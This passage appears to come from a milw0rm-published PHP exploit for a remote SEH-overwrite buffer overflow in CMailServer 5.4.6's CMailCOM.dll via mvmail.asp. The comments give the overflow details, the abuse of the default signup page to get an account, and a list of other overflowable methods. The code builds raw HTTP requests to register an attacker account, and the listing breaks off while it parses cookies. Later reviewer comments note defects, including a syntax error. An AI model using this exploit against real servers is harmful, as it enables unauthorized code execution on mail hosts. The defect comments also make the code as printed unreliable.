0
	        strUID = arrString(i)
	        objPOP3.MoveToFolder strUID ' <---------------- bof
	  ...
	By attaching olly to the w3wp.exe sub-process you will see the usual
	dump with ecx and eip owned, with a buffer of approximately 13000 chars.
        Exploitation is post-auth but you can have a user account by simply
	browsing the signup.asp page, enabled by default.
        Calc.exe will run with NETWORK SERVICE privilege, check tasks. Note
	that 4-5 failed exploit attempts may result in an IIS "Service
	Unavailable" message.
        Other attacks are possible, see a list of locally overflowable
        methods:
        CreateUserPath, Logout, DeleteMailByUID, MoveToInbox, MoveToFolder,
	DeleteMailEx,  GetMailDataEx, SetReplySign, SetForwardSign, SetReadSign.
	Note also that remotely there's some kind of validation (ex. you can
	not have a username with a length of more than 4000 chars which
	could be used instead to overflow the CreateUserPath method and
	you cannot overflow e.g. through the strUID argument) which considerably
	reduces the remote vectors. However, as you can see there is no filter on
	"indexOfMail" one.
        Other notes:
        CMailCOM.SMTP class with CLSID 0609792F-AB56-4CB6-8909-19CDF72CB2A0
	is also vulnerable in the following methods:
        AddAttach, SetSubject, SetBcc, SetBody, SetCc, SetFrom,
        SetTo, SetFromUID
    */
        // --- CLI argument handling ---------------------------------------------
        // error_reporting(7) == E_ERROR|E_WARNING|E_PARSE: E_NOTICE is excluded,
        // which is what keeps the unchecked $argv[1..3] reads below quiet.
        error_reporting(7);$host=$argv[1];$path=$argv[2];
        // Optional third argument: TCP port, default 80. Assignment inside the
        // ternary branches is legacy style; each branch assigns $port.
        $argv[3] ? $port = (int) $argv[3] : $port = 80;
        print ("CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite\n".
               "exploit\n".
               "by Nine:Situations:Group::bookoo\n");
        // Usage check: note it runs only after $host/$path were already read above,
        // so a missing argument produces the usage text rather than a notice.
        $argv[2] ? print("attackin'...\n") : die ("syntax:  php ".$argv[0]." [host] [path] `port`\n".
	                                          "example: php ".$argv[0]." 192.168.0.1 /mail/    \n".
	                                          "   ''    php ".$argv[0]." 192.168.0.1 / 81      \n");
        // Base URL only; $path is prepended to the request line by each caller.
        $url = "http://$host:$port";
        // OS sniff on the first three bytes of PHP_OS ("WIN" => Windows).
        $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
        // dl() loads a shared extension at run time. NOTE(review): it is only
        // available to CLI-style SAPIs in modern PHP and fails unless the library
        // sits in extension_dir; a static `extension=curl` in php.ini is the
        // conventional way to get the extension loaded.
        $win ? dl("php_curl.dll") : dl("php_curl.so");
        //borrowed from bookoo
        /**
         * Sends one request through libcurl and stores the reply.
         *
         * Reads the global $url (built from host/port above) and writes the
         * global $data with the full response, headers included
         * (CURLOPT_HEADER=1 together with CURLOPT_RETURNTRANSFER=1).
         *
         * @param string   $packet value handed to CURLOPT_CUSTOMREQUEST; the callers on
         *                         this page build it as a complete raw request text
         *                         ("POST ... HTTP/1.0\r\n..."). NOTE(review): what
         *                         libcurl does with a multi-line value in this option
         *                         is not shown here — verify before relying on it.
         * @param int|bool $out    truthy to also echo the response to stdout
         * @return void
         *
         * Defects visible in the listing (documented, not changed, in this pass):
         *  - the `if (!extension_loaded("curl")` condition lacks its closing
         *    parenthesis, so the file does not parse as printed;
         *  - curl_close() is reached only on the success branch, so a failed
         *    transfer leaks the handle;
         *  - after a failed transfer $data is false and the print below still runs.
         */
        function send($packet,$out)  {
            global $url, $data; // $data acts as the out-parameter: response of the last call
	    if (!extension_loaded("curl"){ // NOTE: missing ')' in the original listing
		    die("you need the curl extesion loaded to run...");
            }
	    $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL,$url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the body instead of echoing it
            curl_setopt($ch, CURLOPT_TIMEOUT, 5); // whole transfer capped at 5 seconds
            curl_setopt($ch, CURLOPT_HEADER, 1); // keep headers: the caller later splits $data on "Set-Cookie: "
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $packet);
            $data = curl_exec($ch); if (curl_errno($ch)) {
                print curl_error($ch)."\n"; // handle is not closed on this path
            } else {
               curl_close($ch);
            }
            if ($out) print($data."\n");
        }
        // Fixed User-Agent sent with every request. A static string like this is a
        // convenient thing to key on when reviewing web-server logs.
        $agent="Mozilla/5.0 (Windows; U; Windows NT 5.2; it; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";
        //subscribe
        // Account created through the public signup.asp form (the comment block
        // above states signup is enabled by default). Both values are hard-coded.
        $usr="bookoo";$pwd="password";//new usr username & password, change
        // x-www-form-urlencoded body. $usr/$pwd are interpolated without
        // urlencode(), so a value containing '&' or '=' would corrupt the form.
	$d ="Signup=1&Account=$usr&Pass=$pwd&RePass=$pwd&UserName=&Comment=User&POP3Mail=%40ieqowieoqw.com";
        // Raw HTTP/1.0 request text. Content-Length uses strlen() (bytes), which is
        // correct for the byte-oriented body.
        $h ="POST ".$path."signup.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nConnection: Close\r\n\r\n$d";
	send($h,0); // fills the global $data with the raw response (headers + body), nothing echoed
	// Split the raw response at every "Set-Cookie: " header; element 0 is the
	// text before the first one. The loop consuming $tmp starts on the next
	// line and is cut off in this listing.
	$tmp=explode("Set-Cookie: ",$data);
	for ($i=1; $i
# milw0rm.com [2008-07-06]